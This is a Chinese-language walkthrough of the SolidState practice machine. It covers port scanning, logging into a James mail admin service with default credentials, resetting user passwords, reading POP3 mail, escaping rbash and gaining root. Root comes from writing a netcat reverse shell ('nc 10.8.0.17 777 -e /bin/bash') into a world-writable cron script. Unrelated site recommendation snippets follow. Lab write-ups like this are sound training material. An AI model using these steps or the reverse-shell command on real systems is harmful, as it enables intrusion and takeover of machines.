靶机练习4: SolidState
信息收集阶段
全端口扫描,查询目标靶机开放端口和服务
sudo nmap -p- -n -v -sS --max-retries=0 172.16.33.35
进行服务版本扫描
nmap -p22,25,80,110,119,4555 -sV -A 172.16.33.35
发现有陌生服务james-admin
,尝试用searchsploit
看看是否有利用脚本
有几个版本符合的脚本,尝试利用,但都不成功
查看脚本具体内容,发现james-admin
默认账号密码都为root
, 尝试登录
使用help
查看可用命令,注意到有枚举用户的命令listusers
和修改密码的命令setpassword
,修改各用户密码,然后登录POP3
邮箱服务,看各用户的邮件,命令如下:
nc -C 172.16.33.35 110
USER mindy
PASS 123
LIST # 列出所有邮件
RETR 1 # 查看对应邮件
利用漏洞拿shell
发现mindy
的邮件中有账号密码的泄漏,尝试拿这个账号密码去登录远程服务器
登录成功!尝试修改密码,发现Shell
被限制,为rbash
尝试绕过rbash
, 这里使用的方法是登录时加入 -t "bash --noprofile"
ssh mindy@172.16.33.35 -t "bash --noprofile"
登录成功后发现已成功绕过。
跑一下./linpeas.sh
提权脚本,发现没什么发现
提权
可以查看一下系统各个用户的进程,特别关注一下james
的
ps aux | grep james
发现有一个run.sh
在opt
目录下,查看opt
目录时发现有一个tmp.py
文件,该文件的权限是所有用户可读可写可执行
也可以这样查询
find / -user root -perm -o=w -type f 2>/dev/null | grep -v 'proc\|sys'
通过查看该文件内容,判断该文件应该是一个定时删除tmp
目录内文件的脚本,可尝试写入自己的反弹shell
echo 'import os;os.system("/bin/nc 10.8.0.17 777 -e /bin/bash")' > tmp.py
等几分钟后获得shell,获得root权限
靶机练习4: SolidState的更多相关文章
- CTF线下防御战 — 让你的靶机变成“铜墙铁壁”
本文首发安全客,未经允许禁止转载.原文链接 一. 前言 随着CTF的普及,比赛的形式也有了越来越多的花样,对于线下赛来说,开始出现了安全加固或者防御战之类的环节,亦或者因为拿下靶机后不希望其他攻击者进 ...
- Ms17-010进行WEB提权之实践下某培训靶机服务器
前言:该机器为某个其他培训机构的靶机,说实话在这里没炫耀啥,只是给各位学习Ms17010的同学指一条路,我原先也折腾这玩意儿好久,但是就是不行,最近才找到了出路,所以多写两篇文章,把各种需要注意的地方 ...
- metasploit利用漏洞渗透攻击靶机
1.网络测试环境构建 首先需要先配置好一个渗透测试用的网络环境,包括如图1所示的运行Kali Linux系统的计算机,如图2所示的老师给的Windows Server 2000系统的计算机.这两台计算 ...
- web 攻击靶机解题过程
sql注入靶机攻击过程请参考 https://pentesterlab.com/exercises/from_sqli_to_shell/course http://www.sohu.com/a/12 ...
- Fowsniff: 1靶机入侵
一.信息收集 1.存活主机扫描 arp-scan -l 发现192.168.1.13是目标靶机的IP地址 2.端口扫描 接下来用nmap神器来扫描目标IP地址,命令如下: root@kali2018 ...
- digitalworld.local: MERCY靶机入侵
0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统.MERCY是一款游戏名称,与易受攻击的靶机名称无关.本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的 ...
- Moonraker:1靶机入侵
0x01 前言 攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息. Moonraker: 1镜像下载地址: h ...
- FourAndSix: 2.01靶机入侵
0x01 前言 FourAndSix2是易受攻击的一个靶机,主要任务是通过入侵进入到目标靶机系统然后提权,并在root目录中并读取flag.tx信息 FourAndSix2.镜像下载地址: htt ...
- Typhoon-v1.02 靶机入侵
0x01 前言 Typhoon VM包含多个漏洞和配置错误.Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,后期利用步骤,信息收集和DNS ...
- Raven: 2靶机入侵
0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机.有四个flag需要找出.在多次被攻破后,Raven Security采取了额外措施来增强他们的网络服务器安全以防止黑客入侵. ...
随机推荐
- vue打包---放到服务器下(一个服务器多个项目需要配置路径),以及哈希模式和历史模式的不同配置方法
哈希模式,好用,不需要服务器配合分配路径指向,自己单机就可以打开了 接下来上代码截图 接下来开始截图 历史模式 历史模式需要后端支持 打包后自己直接点击是打不开的 截图如下
- Echarts 折线图Demo调色12种,可以直接使用~~~
测试Demo代码~~ <template> <div> <div id="myChart" ref="mapBox" style= ...
- 从 Cloud-Native Relational DB 看数据库设计
论文内容:Amazon Aurora: Design Considerations for HighThroughput Cloud-Native Relational Databases 里面介绍了 ...
- Python函数式编程之map/filter/reduce/sorted
Python函数式编程之map/filter/reduce/sorted 关于函数式编程 函数式编程Functional Programming,其思想更接近数学计算 函数式编程就是一种抽象程度很高的 ...
- ResponseBodyAdvice处理返回数据
package com.xf.config; import org.slf4j.MDC; import org.springframework.core.MethodParameter; import ...
- kali挂代理之——proxychains4
记一次打站需要用到kali,但是得挂代理,就从别人那里知道了一个kali挂代理的工具proxychains4. 首先是打开kali输入:root@Kali:~# vi /etc/proxychains ...
- 第24周SDAI缓解能否预测远期RA骨破坏受抑制
第24周SDAI缓解能否预测远期RA骨破坏受抑制 Hirano F, et al. EULAR 2015. Present ID:THU0085. 原文 译文 THU0085 SDAI REMISSI ...
- [专题总结]Gridea快速免费搭建个人博客
介绍 或许你很想把你所知道的问题写出来,或许你文思泉涌,想给大家分享.我相信,你一定能写好博客,只要坚持,就可以了. 或许大家会不理解,为什么不用大平台的博客呢?或许你稍微了解就会知道,现在的博客平台 ...
- z order curve
https://www.cnblogs.com/tgzhu/p/8286616.html
- vue打印图片
element 中图片打印 [vue element 如何打印弹窗里的内容 无效](https://segmentfault.com/q/1010000015097252) vue element 如 ...